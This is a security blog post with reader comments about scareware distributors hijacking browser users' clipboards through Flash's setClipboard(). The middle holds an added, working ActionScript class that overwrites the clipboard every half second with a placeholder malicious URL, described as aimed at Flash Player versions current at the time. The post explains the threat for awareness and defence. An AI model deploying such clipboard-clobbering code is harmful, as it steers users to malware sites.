I was able to get the test website to load into the clipboard while browsing in Safari under OS X 10.5.4 on my MacBook Pro. It also affected three versions of Firefox running in OS X, Linux (FC6), and XP, all with the NoScript plugin. IE6 and IE7 were affected as well.
Only under IE was it able to use the clipboard to load the "evil" URL. So it's not as effective on Linux/OS X, but it can get part of the way there.
Where is this "test website"? I can't seem to find it. Got a link?
Pwning the clipboard - latest trick used in FakeAlert distribution

There are certain notorious threats whose mere name can make malware analysts groan - Zlob, Pushdo, Dorf (aka Storm) to name but a few. Just recently, a new class of malware has started to have the same effect: we are seeing an abundance of fake alert trojans, malware designed to scam the victim into paying money to remove non-existent threats [1,2].
If the professional-looking sites being used to distribute this fake alert malware are anything to go by, the criminals behind it are very organized. They are making significant efforts to evade detection and filtering, using polymorphic packing techniques and hosting the content on numerous domains.
They are using aggressive techniques to infect victims as well, for example large spam campaigns and compromised web sites. At the end of last week another interesting technique was discovered: they were clobbering the contents of the user's clipboard with the URL of their distribution site. Numerous postings to various forums reported similar issues, for example [3]:
I'm going crazy here. Any time I copy a URL by selecting it, then pressing Ctrl+C, the next time I paste something it comes up with this link: http://[removed].net /?id= (link intentionally broken) Probably a spam/virus link, I wouldn't click on it. For instance, I copy http://www.google.com onto the Windows clipboard and what I paste is the former URL. I had this happen a week ago, so I scanned my drives with AVG (found nothing). So, I reformatted my hard drive and reinstalled Windows. Now, a week later, it's doing it again. Does anyone have _any_ idea where this is coming from?
So, the attackers are overwriting the victim's clipboard in the hope that the victim subsequently pastes the URL somewhere that results in traffic to their site. Not that unlikely: users frequently copy and paste links to each other via email, IM, or comment postings.
A nasty little trick, but is it anything new? No: techniques to automatically copy data to the system clipboard using common scripting languages (JavaScript and ActionScript) are well known.
The fact that victims report experiencing these issues after browsing legitimate, popular sites suggests that malicious Flash is the culprit. The attackers are probably using the setClipboard() method [4] in ActionScript embedded in Flash content. Perhaps the attackers have poisoned an ad stream as a way of hitting large volumes of users?
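The following ActionScript 3 class is an added illustration of the technique described above; it is not code from the original post, from the malware, or from the proof-of-concept referred to in the comments. It shows why a single click on a page is enough to clobber the clipboard repeatedly: a Timer calls System.setClipboard() every half second for as long as the SWF is running, so anything the user copies is replaced before they can paste it. The URL is a placeholder (a hypothetical .example host), as are the class name and the 500 ms interval.

```actionscript
package {
    import flash.display.Sprite;
    import flash.events.TimerEvent;
    import flash.system.System;
    import flash.utils.Timer;

    // Added example: a SWF that keeps overwriting the system clipboard.
    // Embedding this (e.g. via an ad stream) needs no user interaction
    // in the Flash Player versions current at the time of the post.
    public class ClipboardClobber extends Sprite {
        // Placeholder distribution URL; the real samples used a
        // "/?id=" style link on a throwaway domain.
        private static const EVIL_URL:String = "http://evil.example/?id=";

        // Timer(delay in ms, repeatCount 0 = repeat forever).
        private var clobberTimer:Timer = new Timer(500, 0);

        public function ClipboardClobber() {
            clobberTimer.addEventListener(TimerEvent.TIMER, onTick);
            clobberTimer.start();
        }

        private function onTick(e:TimerEvent):void {
            // System.setClipboard is write-only: the SWF cannot read
            // what the user copied, it can only replace it.
            System.setClipboard(EVIL_URL);
        }
    }
}
```

Because the timer lives inside the SWF, the overwriting stops as soon as the movie is unloaded, which is why navigating away from the hosting page (or closing the tab) ends the attack. Note that Flash Player 10 later restricted System.setClipboard() to handlers of user-initiated events (a mouse click or keypress), so this timer-driven form no longer works in patched players; a SWF would then need to trick the user into clicking it first.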
At the time of writing, I am aware of the victim's clipboard being overwritten with one of two URLs. In each case browsing to the URL results in the fake system scan running on the victim's machine, very similar to the one reported here.
I guess we should be glad the Adobe folks were wise enough to not provide the corresponding getClipboard() method!
The clipboard hijack exploit DOES INDEED work on an OS X Mac with Safari!
Security researcher Aviv Raff has created a proof-of-concept demo to show how easy it is to use Flash with ActionScript code to load (persistently) a malicious URL into a target clipboard. (BEWARE: if you click on the demo link, your clipboard is automatically hijacked and will only be released if the browser window is closed.)
For those of you who want to try it, the link to the demo page is below:
I have found, however, that with a Mac, simply navigating away from the offending hijacking website will end the attack. There is no need to close the browser window.
NoScript will not block Flash script exploits. The best security combo for Firefox is Adblock Plus + NoScript + FlashBlock. And if you are really surf-paranoid, get the ImgLikeOpera extension for FF too; it lets you block all graphics (to avoid rare GIF exploits).